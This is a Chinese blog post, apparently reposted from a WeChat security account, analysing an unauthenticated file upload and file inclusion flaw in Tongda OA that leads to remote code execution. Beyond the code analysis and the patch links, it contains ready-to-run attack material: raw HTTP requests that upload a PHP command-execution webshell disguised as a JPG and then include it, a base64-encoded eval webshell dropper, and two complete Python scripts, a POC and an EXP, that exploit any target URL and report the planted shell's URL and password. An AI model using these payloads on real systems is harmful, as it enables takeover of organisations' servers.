通达OA 文件上传/包含导致RCE

admin

139008
文章

114
评论

2023年4月5日04:23:03评论121 views字数 17279阅读57分35秒阅读模式

影响范围

V11版
2017版
2016版
2015版
2013版
2013增强版

漏洞类型

文件上传&文件包含=>RCE

漏洞危害

文件上传&文件包含=>RCE

利用条件

在影响范围内的通达OA程序

漏洞简介

通达OA是由北京通达信科科技有限公司开发的一款办公系统，近日通达官方在其官网发布了安全提醒与更新程序，并披露有用户遭到攻击。

攻击者在未授权的情况下可上传任意内容的图片文件，再通过精心构造的请求进行文件包含，触发远程代码执行。攻击者无须权限即可完成攻击，受攻击的目标系统只需运行即可能被远程入侵。

漏洞分析

在这里文件全部已经使用zend加密了，所以向要进行解密，解密网站：http://dezend.qiling.org/free/

通达OA 文件上传/包含导致RCE

文件上传功能

C:MyoAwebrootispiritimupload.php:

<?php//decode by http://dezend.qiling.org  QQ 2859470
set_time_limit(0);$P = $_POST['P'];if (isset($P) || $P != '') {    ob_start();    include_once 'inc/session.php';    session_id($P);    session_start();    session_write_close();} else {    include_once './auth.php';}include_once 'inc/utility_file.php';include_once 'inc/utility_msg.php';include_once 'mobile/inc/funcs.php';ob_end_clean();$TYPE = $_POST['TYPE'];$DEST_UID = $_POST['DEST_UID'];$dataBack = array();if ($DEST_UID != '' && !td_verify_ids($ids)) {    $dataBack = array('status' => 0, 'content' => '-ERR ' . _('接收方ID无效'));    echo json_encode(data2utf8($dataBack));    exit;}if (strpos($DEST_UID, ',') !== false) {} else {    $DEST_UID = intval($DEST_UID);}if ($DEST_UID == 0) {    if ($UPLOAD_MODE != 2) {        $dataBack = array('status' => 0, 'content' => '-ERR ' . _('接收方ID无效'));        echo json_encode(data2utf8($dataBack));        exit;    }}$MODULE = 'im';if (1 <= count($_FILES)) {    if ($UPLOAD_MODE == '1') {        if (strlen(urldecode($_FILES['ATTACHMENT']['name'])) != strlen($_FILES['ATTACHMENT']['name'])) {            $_FILES['ATTACHMENT']['name'] = urldecode($_FILES['ATTACHMENT']['name']);        }    }    $ATTACHMENTS = upload('ATTACHMENT', $MODULE, false);    if (!is_array($ATTACHMENTS)) {        $dataBack = array('status' => 0, 'content' => '-ERR ' . $ATTACHMENTS);        echo json_encode(data2utf8($dataBack));        exit;    }    ob_end_clean();    $ATTACHMENT_ID = substr($ATTACHMENTS['ID'], 0, -1);    $ATTACHMENT_NAME = substr($ATTACHMENTS['NAME'], 0, -1);    if ($TYPE == 'mobile') {        $ATTACHMENT_NAME = td_iconv(urldecode($ATTACHMENT_NAME), 'utf-8', MYOA_CHARSET);    }} else {    $dataBack = array('status' => 0, 'content' => '-ERR ' . _('无文件上传'));    echo json_encode(data2utf8($dataBack));    exit;}$FILE_SIZE = attach_size($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);if (!$FILE_SIZE) {    $dataBack = array('status' => 0, 'content' => '-ERR ' . _('文件上传失败'));    echo json_encode(data2utf8($dataBack));    exit;}if ($UPLOAD_MODE == '1') {    if (is_thumbable($ATTACHMENT_NAME)) {        $FILE_PATH = attach_real_path($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);        $THUMB_FILE_PATH = substr($FILE_PATH, 0, strlen($FILE_PATH) - strlen($ATTACHMENT_NAME)) . 'thumb_' . $ATTACHMENT_NAME;        CreateThumb($FILE_PATH, 320, 240, $THUMB_FILE_PATH);    }    $P_VER = is_numeric($P_VER) ? intval($P_VER) : 0;    $MSG_CATE = $_POST['MSG_CATE'];    if ($MSG_CATE == 'file') {        $CONTENT = '[fm]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $FILE_SIZE . '[/fm]';    } else {        if ($MSG_CATE == 'image') {            $CONTENT = '[im]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $FILE_SIZE . '[/im]';        } else {            $DURATION = intval($DURATION);            $CONTENT = '[vm]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $DURATION . '[/vm]';        }    }    $AID = 0;    $POS = strpos($ATTACHMENT_ID, '@');    if ($POS !== false) {        $AID = intval(substr($ATTACHMENT_ID, 0, $POS));    }    $query = 'INSERT INTO im_offline_file (TIME,SRC_UID,DEST_UID,FILE_NAME,FILE_SIZE,FLAG,AID) values ('' . date('Y-m-d H:i:s') . '','' . $_SESSION['LOGIN_UID'] . '','' . $DEST_UID . '','*' . $ATTACHMENT_ID . '.' . $ATTACHMENT_NAME . '','' . $FILE_SIZE . '','0','' . $AID . '')';    $cursor = exequery(TD::conn(), $query);    $FILE_ID = mysql_insert_id();    if ($cursor === false) {        $dataBack = array('status' => 0, 'content' => '-ERR ' . _('数据库操作失败'));        echo json_encode(data2utf8($dataBack));        exit;    }    $dataBack = array('status' => 1, 'content' => $CONTENT, 'file_id' => $FILE_ID);    echo json_encode(data2utf8($dataBack));    exit;} else {    if ($UPLOAD_MODE == '2') {        $DURATION = intval($_POST['DURATION']);        $CONTENT = '[vm]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $DURATION . '[/vm]';        $query = 'INSERT INTO WEIXUN_SHARE (UID, CONTENT, ADDTIME) VALUES ('' . $_SESSION['LOGIN_UID'] . '', '' . $CONTENT . '', '' . time() . '')';        $cursor = exequery(TD::conn(), $query);        echo '+OK ' . $CONTENT;    } else {        if ($UPLOAD_MODE == '3') {            if (is_thumbable($ATTACHMENT_NAME)) {                $FILE_PATH = attach_real_path($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);                $THUMB_FILE_PATH = substr($FILE_PATH, 0, strlen($FILE_PATH) - strlen($ATTACHMENT_NAME)) . 'thumb_' . $ATTACHMENT_NAME;                CreateThumb($FILE_PATH, 320, 240, $THUMB_FILE_PATH);            }            echo '+OK ' . $ATTACHMENT_ID;        } else {            $CONTENT = '[fm]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $FILE_SIZE . '[/fm]';            $msg_id = send_msg($_SESSION['LOGIN_UID'], $DEST_UID, 1, $CONTENT, '', 2);            $query = 'insert into IM_OFFLINE_FILE (TIME,SRC_UID,DEST_UID,FILE_NAME,FILE_SIZE,FLAG) values ('' . date('Y-m-d H:i:s') . '','' . $_SESSION['LOGIN_UID'] . '','' . $DEST_UID . '','*' . $ATTACHMENT_ID . '.' . $ATTACHMENT_NAME . '','' . $FILE_SIZE . '','0')';            $cursor = exequery(TD::conn(), $query);            $FILE_ID = mysql_insert_id();            if ($cursor === false) {                echo '-ERR ' . _('数据库操作失败');                exit;            }            if ($FILE_ID == 0) {                echo '-ERR ' . _('数据库操作失败2');                exit;            }            echo '+OK ,' . $FILE_ID . ',' . $msg_id;            exit;        }    }}

关键核心代码1：

通达OA 文件上传/包含导致RCE

从上面的逻辑中可以看到，这里只要传递的参数"P"，那么就不会进入else语句，这里的auth.php主要实现身份认证功能，所以此处可以绕过登录认证，在未授权的情况下访问上传功能点~

关键核心代码2：

通达OA 文件上传/包含导致RCE

从上面的代码中可以看到，这里要想成功进入到文件上传处理逻辑功能(L39)，我们需要先通过前面的if判断检测，通过分析上面的代码可以看到，这里我们需要上传一个DEST_UID不为空，且不为0的值即可。

在文件上传处理逻辑代码中，会对"$_FILES['ATTACHMENT']['name'])"进行一次url解码，之后判断和文件名长度是否有变化，如果有变化，则将url解码后的文件名作为最后的文件名。

在L45行代码可以看到，这里会调用upload函数对文件进行一个检测，经过跟踪发现该文件位于——inc/utility_file.php的1321行，具体函数代码如下：

function upload($PREFIX = 'ATTACHMENT', $MODULE = '', $OUTPUT = true){    if (strstr($MODULE, '/') || strstr($MODULE, '\')) {        if (!$OUTPUT) {            return _('参数含有非法字符。');        }        Message(_('错误'), _('参数含有非法字符。'));        exit;    }    $ATTACHMENTS = array('ID' => '', 'NAME' => '');    reset($_FILES);    foreach ($_FILES as $KEY => $ATTACHMENT) {        if ($ATTACHMENT['error'] == 4 || $KEY != $PREFIX && substr($KEY, 0, strlen($PREFIX) + 1) != $PREFIX . '_') {            continue;        }        $data_charset = isset($_GET['data_charset']) ? $_GET['data_charset'] : (isset($_POST['data_charset']) ? $_POST['data_charset'] : '');        $ATTACH_NAME = $data_charset != '' ? td_iconv($ATTACHMENT['name'], $data_charset, MYOA_CHARSET) : $ATTACHMENT['name'];        $ATTACH_SIZE = $ATTACHMENT['size'];        $ATTACH_ERROR = $ATTACHMENT['error'];        $ATTACH_FILE = $ATTACHMENT['tmp_name'];        $ERROR_DESC = '';        if ($ATTACH_ERROR == UPLOAD_ERR_OK) {            if (!is_uploadable($ATTACH_NAME)) {                $ERROR_DESC = sprintf(_('禁止上传后缀名为[%s]的文件'), substr($ATTACH_NAME, strrpos($ATTACH_NAME, '.') + 1));            }            $encode = mb_detect_encoding($ATTACH_NAME, array('ASCII', 'UTF-8', 'GB2312', 'GBK', 'BIG5'));            if ($encode != 'UTF-8') {                $ATTACH_NAME_UTF8 = mb_convert_encoding($ATTACH_NAME, 'utf-8', MYOA_CHARSET);            } else {                $ATTACH_NAME_UTF8 = $ATTACH_NAME;            }            if (preg_match('/[\':<>?]|\/|\\|"|\|/u', $ATTACH_NAME_UTF8)) {                $ERROR_DESC = sprintf(_('文件名[%s]包含[/\'":*?<>|]等非法字符'), $ATTACH_NAME);            }            if ($ATTACH_SIZE == 0) {                $ERROR_DESC = sprintf(_('文件[%s]大小为0字节'), $ATTACH_NAME);            }            if ($ERROR_DESC == '') {                $ATTACH_NAME = str_replace(''', '', $ATTACH_NAME);                $ATTACH_ID = add_attach($ATTACH_FILE, $ATTACH_NAME, $MODULE);                if ($ATTACH_ID === false) {                    $ERROR_DESC = sprintf(_('文件[%s]上传失败'), $ATTACH_NAME);                } else {                    $ATTACHMENTS['ID'] .= $ATTACH_ID . ',';                    $ATTACHMENTS['NAME'] .= $ATTACH_NAME . '*';                }            }            @unlink($ATTACH_FILE);        } else {            if ($ATTACH_ERROR == UPLOAD_ERR_INI_SIZE) {                $ERROR_DESC = sprintf(_('文件[%s]的大小超过了系统限制（%s）'), $ATTACH_NAME, ini_get('upload_max_filesize'));            } else {                if ($ATTACH_ERROR == UPLOAD_ERR_FORM_SIZE) {                    $ERROR_DESC = sprintf(_('文件[%s]的大小超过了表单限制'), $ATTACH_NAME);                } else {                    if ($ATTACH_ERROR == UPLOAD_ERR_PARTIAL) {                        $ERROR_DESC = sprintf(_('文件[%s]上传不完整'), $ATTACH_NAME);                    } else {                        if ($ATTACH_ERROR == UPLOAD_ERR_NO_TMP_DIR) {                            $ERROR_DESC = sprintf(_('文件[%s]上传失败：找不到临时文件夹'), $ATTACH_NAME);                        } else {                            if ($ATTACH_ERROR == UPLOAD_ERR_CANT_WRITE) {                                $ERROR_DESC = sprintf(_('文件[%s]写入失败'), $ATTACH_NAME);                            } else {                                $ERROR_DESC = sprintf(_('未知错误[代码：%s]'), $ATTACH_ERROR);                            }                        }                    }                }            }        }        if ($ERROR_DESC != '') {            if (!$OUTPUT) {                delete_attach($ATTACHMENTS['ID'], $ATTACHMENTS['NAME'], $MODULE);                return $ERROR_DESC;            } else {                Message(_('错误'), $ERROR_DESC);            }        }    }    return $ATTACHMENTS;}

之后在上面的代码中，调用了当前文件下的is_uploadable()函数对文件名进行检查：

通达OA 文件上传/包含导致RCE

从上面的代码中可以看到，这里过滤的php后缀格式，不允许上传php类型文件，所以，我们到这里我们没法直接上传一个PHP木马文件来getshell，最好的方法就是再找一个文件包含类漏洞，形成一个组合拳：先上传图片木马文件，之后在用文件包含漏洞包含该图片木马，从而远程RCE，不过很幸运的是确实还有一个文件包含类漏洞~

文件包含功能

C:MyoAwebrootispiritinterfacegateway.php

<?php//decode by http://dezend.qiling.org  QQ 2859470
ob_start();include_once 'inc/session.php';include_once 'inc/conn.php';include_once 'inc/utility_org.php';if ($P != '') {    if (preg_match('/[^a-z0-9;]+/i', $P)) {        echo _('非法参数');        exit;    }    session_id($P);    session_start();    session_write_close();    if ($_SESSION['LOGIN_USER_ID'] == '' || $_SESSION['LOGIN_UID'] == '') {        echo _('RELOGIN');        exit;    }}if ($json) {    $json = stripcslashes($json);    $json = (array) json_decode($json);    foreach ($json as $key => $val) {        if ($key == 'data') {            $val = (array) $val;            foreach ($val as $keys => $value) {                ${$keys} = $value;            }        }        if ($key == 'url') {            $url = $val;        }    }    if ($url != '') {        if (substr($url, 0, 1) == '/') {            $url = substr($url, 1);        }        if (strpos($url, 'general/') !== false || strpos($url, 'ispirit/') !== false || strpos($url, 'module/') !== false) {            include_once $url;        }    }    exit;}

从上面的逻辑可以看到，这里只需要不传递参数P就可以绕过检测进入到下面的if语句中，之后从json中获取url参数，之后在L40包含指定的文件~

到这里，我们可能也会想到如果向日志文件中写shell，之后再通过日志文件来实现getshell，也是不错的一种做法~

综上所述，可总结如下：

文件上传功能：参数p不为空，且不能上传php后缀格式文件
文件包含功能：参数p要为空，在url中指定要包含的文件。

漏洞复现

环境搭建

通达OA下载：

链接：https://pan.baidu.com/s/1QFAoLxj9pD1bnnq3f4I8lg

提取码：ousi

通达OA 文件上传/包含导致RCE

下载之后直接点击运行即可(不可占用80端口哦)：

通达OA 文件上传/包含导致RCE

之后启用服务即可

通达OA 文件上传/包含导致RCE

在浏览器中访问，成功完成环境搭建：

通达OA 文件上传/包含导致RCE

漏洞复现

命令执行

这里首先借助upload-labs构造一个文件上传表单，之后根据之前的代码分析修改请求数据包如下：

POST /ispirit/im/upload.php HTTP/1.1Host: 192.168.174.159:80Content-Length: 655Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="UPLOAD_MODE"
2------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="P"

------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="DEST_UID"
1------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg
<?php$command=$_POST['cmd'];$wsh = new COM('WScript.shell');$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>------WebKitFormBoundaryBwVAwV3O4sifyhr3--

成功上传图片木马文件：

通达OA 文件上传/包含导致RCE

PS：如果这里在上传文件时有文件名，需要注意上传后的文件名格式为“序列.文件名.jpg”，我这里为了方便就直接设置文件名为空了~

之后进行文件包含，并执行命令：

POST /ispirit/interface/gateway.php HTTP/1.1Host: 192.168.174.159User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 69
json={"url":"/general/../../attach/im/2003/354900984.jpg"}&cmd=whoami

通达OA 文件上传/包含导致RCE

由此可见文件包含+文件上传==>命令执行成功实现！

POC验证

通达OA 文件上传/包含导致RCE

Getshell

同时，我们也可以写shell文件进去，下面试试看~

首先，构造上传的图片木马文件内容如下：

POST /ispirit/im/upload.php HTTP/1.1Host: 192.168.174.159:80Content-Length: 602Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="UPLOAD_MODE"
2------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="P"

------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="DEST_UID"
1------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg
<?php$fp = fopen('404.php', 'w');$a = base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==");fwrite($fp, $a);fclose($fp);?>------WebKitFormBoundaryBwVAwV3O4sifyhr3--

之后上传文件：

通达OA 文件上传/包含导致RCE

之后使用文件包含：

POST /ispirit/interface/gateway.php HTTP/1.1Host: 192.168.174.159User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 59
json={"url":"/general/../../attach/im/2003/1153189608.jpg"}

通达OA 文件上传/包含导致RCE

之后在服务器端成功写入webshell——404.php

通达OA 文件上传/包含导致RCE

之后使用菜刀连接：

通达OA 文件上传/包含导致RCE

成功连接到shell

通达OA 文件上传/包含导致RCE

EXP验证

通达OA 文件上传/包含导致RCE

漏洞POC

简易验证poc

#!/usr/bin/env python3# -*- encoding: utf-8 -*-'''@File    :   Tongda_rce.py@Time    :   2020/03/19 12:00:00@Author  :   Al1ex @Github   :   https://github.com/Al1ex'''
import requestsimport reimport sys

def check(url):
    try:        upload_url = url + '/ispirit/im/upload.php'        flag="nt authoritysystem";         headers = {          "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3",          "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",           "Accept-Encoding": "gzip, deflate",          "Accept-Language": "zh-CN,zh;q=0.9",            "Connection": "close"          }        payload ='''------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="UPLOAD_MODE"
2------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="P"

------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="DEST_UID"
1------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg
<?php$command=$_POST['cmd'];$wsh = new COM('WScript.shell');$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>------WebKitFormBoundaryBwVAwV3O4sifyhr3--        '''                response = requests.post(upload_url, headers=headers, data=payload)        path = response.text        filename = path[path.find('@')+1:path.rfind('|')].replace("_","/").replace("|",".").replace("\","")        if response.status_code == 200 and "OK" in path:            result = include_file(url,filename)            if flag in result:                return result            else:                return         else:            print("[+] File upload Fail!")            return    except:       pass
def include_file(url,filename):        include_url = url + "/ispirit/interface/gateway.php"        headers = {            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",             "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",            "Accept-Encoding": "gzip, deflate",            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",              "Content-Type":"application/x-www-form-urlencoded",            "Connection": "close"            }        payload = {          "json":"{"url":"/general/../../attach/im/" + filename + ""}",          "cmd":"whoami"        }        response = requests.post(include_url,headers=headers,data=payload)        return response.text        

if __name__ == '__main__':    print(''' _______                  _____          _____   _____ ______ |__   __|                |  __         |  __  / ____|  ____|   | | ___  _ __   __ _  | |  | | __ _  | |__) | |    | |__      | |/ _ | '_  / _` | | |  | |/ _` | |  _  /| |    |  __|     | | (_) | | | | (_| | | |__| | (_| | | |  | |____| |____    |_|___/|_| |_|__, | |_____/ __,_| |_|  _\_____|______|                   __/ |                                                        |___/                                               ''')    url = sys.argv[1]    result = check(url)    if result:        print("[+] Congratulations target is vulnerable!!!")        print("[+] Remote code execution result is:"+result)
    else:        print("[-] There is no remote code execution vulnerability in the target address")

通达OA 文件上传/包含导致RCE

漏洞EXP

#!/usr/bin/env python3# -*- encoding: utf-8 -*-'''@File    :   Tongda_rce.py@Time    :   2020/03/19 12:00:00@Author  :   Al1ex @Github   :   https://github.com/Al1ex'''
import requestsimport reimport sys

def check(url):
    try:        upload_url = url + '/ispirit/im/upload.php'        flag="nt authoritysystem";         headers = {          "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3",          "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",           "Accept-Encoding": "gzip, deflate",          "Accept-Language": "zh-CN,zh;q=0.9",            "Connection": "close"          }        payload ='''------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="UPLOAD_MODE"
2------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="P"

------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="DEST_UID"
1------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg
<?php$fp = fopen('404.php', 'w');$a = base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==");fwrite($fp, $a);fclose($fp);?>------WebKitFormBoundaryBwVAwV3O4sifyhr3--        '''                response = requests.post(upload_url, headers=headers, data=payload)        path = response.text        filename = path[path.find('@')+1:path.rfind('|')].replace("_","/").replace("|",".").replace("\","")        if response.status_code == 200 and "OK" in path:            result = include_file(url,filename)            shell_url=url+'/ispirit/interface/404.php'            verify = requests.get(shell_url)            if result.status_code == 200 and verify.status_code == 200:                return shell_url            else:                return         else:            print("[+] File upload Fail!")            return    except:       pass
def include_file(url,filename):        include_url = url + "/ispirit/interface/gateway.php"        headers = {            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",             "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",            "Accept-Encoding": "gzip, deflate",            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",              "Content-Type":"application/x-www-form-urlencoded",            "Connection": "close"            }        payload = {          "json":"{"url":"/general/../../attach/im/" + filename + ""}",        }        response = requests.post(include_url,headers=headers,data=payload)        return response        

if __name__ == '__main__':    print(''' _______                  _____          _____   _____ ______ |__   __|                |  __         |  __  / ____|  ____|   | | ___  _ __   __ _  | |  | | __ _  | |__) | |    | |__      | |/ _ | '_  / _` | | |  | |/ _` | |  _  /| |    |  __|     | | (_) | | | | (_| | | |__| | (_| | | |  | |____| |____    |_|___/|_| |_|__, | |_____/ __,_| |_|  _\_____|______|                   __/ |                                                        |___/                                               ''')    url = sys.argv[1]    result = check(url)    if result:        print("[+] Congratulations target is vulnerable!!!")        print("[+] Shell's URL is:"+result)        print("[+] Shell's password is cmd!")
    else:        print("[-] There is no remote code execution vulnerability in the target address")

防御措施

根据已知的恶意攻击风险，建议尽快测试更新补丁：

V11版：
http://cdndown.tongda2000.com/oa/security/2020_A1.11.3.exe

2017版：
http://cdndown.tongda2000.com/oa/security/2020_A1.10.19.exe

2016版：
http://cdndown.tongda2000.com/oa/security/2020_A1.9.13.exe

2015版：
http://cdndown.tongda2000.com/oa/security/2020_A1.8.15.exe

2013增强版：
http://cdndown.tongda2000.com/oa/security/2020_A1.7.25.exe

2013版：
http://cdndown.tongda2000.com/oa/security/2020_A1.6.20.exe

参考链接

https://github.com/jas502n/OA-tongda-RCE

http://www.tongda2000.com/news/673.php

原文始发于微信公众号（七芒星实验室）：通达OA 文件上传/包含导致RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

通达OA 文件上传/包含导致RCE

影响范围

漏洞类型

漏洞危害

利用条件

漏洞简介

漏洞分析

文件上传功能

文件包含功能

漏洞复现

环境搭建

漏洞复现

命令执行

POC验证

Getshell

漏洞POC

漏洞EXP

防御措施

参考链接

HTB - nocturnal

渗透测试 | 某系统三连shell

2025年LLM应用十大安全风险！OWASP最新指南

election

当心你的 AI！使用 Replit AI 掩盖你的 C2 流量

HTB-CozyHosting 红队靶机三阶渗透思维突破：Cookie伪造+命令注入组合拳

【vulhub】 GoldenEye

MCP带来的新型安全威胁

一次有趣的前端加密对抗分享

记一次对湾湾站点的getshell到网

发表评论

在线咨询

微信